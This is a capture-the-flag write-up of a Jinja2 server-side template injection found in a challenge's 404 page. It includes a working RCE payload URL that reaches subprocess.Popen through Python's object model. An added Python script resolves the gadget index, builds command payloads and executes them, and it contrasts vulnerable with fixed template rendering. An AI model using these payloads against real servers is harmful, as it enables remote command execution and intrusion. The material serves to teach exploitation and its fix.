https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4a7fa8e6-4362-4899-9663-c9effd4b2d62/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/11ee55b6-fb01-4e71-844d-06f118d38ad1/Untitled.png

The challenge is shown above.

At first glance it looks like a SQL injection. PS: a lot of people were indeed running sqlmap against it, which made the challenge unavailable, even though the rules clearly said there was no need for enumeration/auto-exploit tools.

So I was tampering with the username and password form, and whatever I put into the user/password fields, the response was always the same.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8db80829-4fed-496d-8437-ef036a2ecdae/Untitled.png

So I was a bit confused, since at first I thought this really was a SQL injection, but then I took a look at the source code to see how my request was actually sent:

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f59eb1cb-505a-4f1d-ab51-4fe9ebaa71de/Untitled.png

It is just sending a POST request with my input username and password to /login?

Hmmmmm. So I tried to find other interesting/well-known files, like robots.txt:

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e0e0c61c-b1bd-443e-a22f-fddfaf214a9f/Untitled.png

Now here comes the interesting part! The response page simply reflected the name of the file we requested into the HTML page. That instantly rang a bell for me: SSTI. A 404 page that echoes the requested path is a classic place for it, because the path is often concatenated straight into the template source instead of being passed to the template as data.

Essentially, the website is rendered using a template framework such as Jinja2, Twig, etc.

And the rest is history...

swisskyrepo/PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings), Server Side Template Injection section

A quick probe with {{7*7}} showed that the engine used to render the HTML page evaluates Python-syntax expressions. ({{7*7}} on its own only proves that expressions are evaluated; {{7*'7'}} separates the candidates, rendering 7777777 in Jinja2 but 49 in Twig.)

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/05ecd014-d804-4c10-9699-31118bfa4d6a/Untitled.png

So, let's find out how we can achieve RCE via Jinja2 and Python's object model. The idea is to start from any object (an empty string), climb to `object` via the MRO, and walk `object.__subclasses__()` until we reach a class that can run commands, such as subprocess.Popen. The index used below ([-64]) is specific to the challenge's interpreter and loaded modules; on another target the same class sits at a different offset.

http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/{{''.__class__.mro()[1].__subclasses__()[-64]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
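The gadget chain behind that payload, plus the reflected-filename pattern from the robots.txt step and the {{7*7}} fingerprint, as an added Python example that is not part of the original writeup. It resolves the Popen index by name instead of hardcoding -64, executes the same chain locally, and, when Jinja2 happens to be installed, contrasts the vulnerable "concatenate the path into the template" pattern with the fixed "pass the path as data" pattern. The assumption that the challenge's 404 page concatenated the request path into the template source is mine; the page only shows that the filename was reflected.

```python
import subprocess  # loads subprocess.Popen into the interpreter, as a web app usually has

# ''.__class__.mro()[1] is `object`; object.__subclasses__() lists every class
# currently loaded, including subprocess.Popen if `subprocess` was imported
# anywhere in the target process. This is the walk the payload performs.
def loaded_classes():
    return ''.__class__.mro()[1].__subclasses__()

def find_subclass_index(name):
    """Index of the class called `name` in object.__subclasses__(), or -1.

    The writeup's payload hardcodes [-64]; that offset depends on the Python
    version and on which modules the target imported, so locate the gadget
    by name rather than guessing the index.
    """
    for i, cls in enumerate(loaded_classes()):
        if cls.__name__ == name:
            return i
    return -1

def run_via_gadget(cmd):
    """Execute `cmd` exactly as the payload does, never naming `subprocess`.

    stdout=-1 is subprocess.PIPE; communicate()[0] is the captured stdout.
    """
    idx = find_subclass_index("Popen")
    if idx < 0:
        raise RuntimeError("subprocess.Popen is not loaded in this process")
    popen = loaded_classes()[idx]
    return popen(cmd, shell=True, stdout=-1).communicate()[0].strip()

def build_payload(cmd):
    """Jinja2 SSTI payload with the Popen index resolved for this interpreter."""
    idx = find_subclass_index("Popen")
    return ("{{''.__class__.mro()[1].__subclasses__()[%d]('%s',shell=True,"
            "stdout=-1).communicate()[0].strip()}}" % (idx, cmd))

# Engine fingerprint: expected Jinja2 output for the two probe expressions.
# Twig renders {{7*'7'}} as 49 (string coerced to number), so the second
# probe is what actually separates Jinja2 from Twig.
def jinja2_probe_expectations():
    return {"{{7*7}}": "49", "{{7*'7'}}": "7777777"}

# Vulnerable vs. fixed 404 rendering; only defined when Jinja2 is installed.
# Assumption (not shown on the page): the challenge built its 404 page by
# concatenating the requested path into the template source.
try:
    from jinja2 import Environment

    def render_not_found_vulnerable(path):
        # user input becomes part of the TEMPLATE, so {{...}} is evaluated
        return Environment().from_string("File " + path + " not found").render()

    def render_not_found_fixed(path):
        # user input is passed as DATA; Jinja2 prints it literally, so
        # {{7*7}} comes back as the text "{{7*7}}" instead of 49
        tpl = Environment(autoescape=True).from_string("File {{ path }} not found")
        return tpl.render(path=path)
except ImportError:
    pass

if __name__ == "__main__":
    print("Popen index in this interpreter:", find_subclass_index("Popen"))
    print(build_payload("id"))
    print(run_via_gadget("echo hello").decode())
```

Usage note: running the script prints the index where Popen sits in this interpreter, which will almost certainly differ from the challenge's -64; that is exactly why a blind index is fragile and why a loop over `__subclasses__()` (or a `{% for c in ''.__class__.mro()[1].__subclasses__() %}` loop in the template itself) is the more reliable way to find the gadget on a real target.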